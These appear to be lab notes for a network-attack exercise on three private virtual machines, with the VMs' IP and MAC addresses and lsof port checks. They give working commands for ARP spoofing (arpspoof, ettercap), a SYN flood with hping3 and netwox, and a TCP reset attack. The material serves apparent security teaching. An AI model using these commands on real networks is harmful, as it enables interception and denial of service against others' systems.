VM1a:
     IP-192.168.255.11
    MAC-08:00:27:99:d3:25
VM2c:
     IP-192.168.255.22
    MAC-08:00:27:22:ea:bb

VM3s:
     IP-192.168.255.33
    MAC-08:00:27:58:69:fa

Need to start xinetd service on port 23 in order to connect from vm2c
to vm3s

Check all ports with: sudo lsof -i -P -n
Check all listening ports with: sudo lsof -i -P -n | grep LISTEN

Ensure that an xinetd service is running on vm3s

Install arpspoof with sudo apt-get install dsniff
Execute ARP Spoofing attack with command:
sudo arpspoof -i eth1 -t 192.168.255.22 192.168.255.33 & > /dev/null

SYN-Flood Attack
netwox 76
Install hping3 with sudo apt-get install hping3
sudo hping3 -p 23 -I eth1 --flood 192.168.255.33

TCP-Reset Attack
netwox 78


# Install ettercap (both gtk and text-only)
# Execute ARP Spoofing attack with command:
# sudo ettercap -Tqi eth1 -M arp /192.168.255.22/ /192.168.255.33/
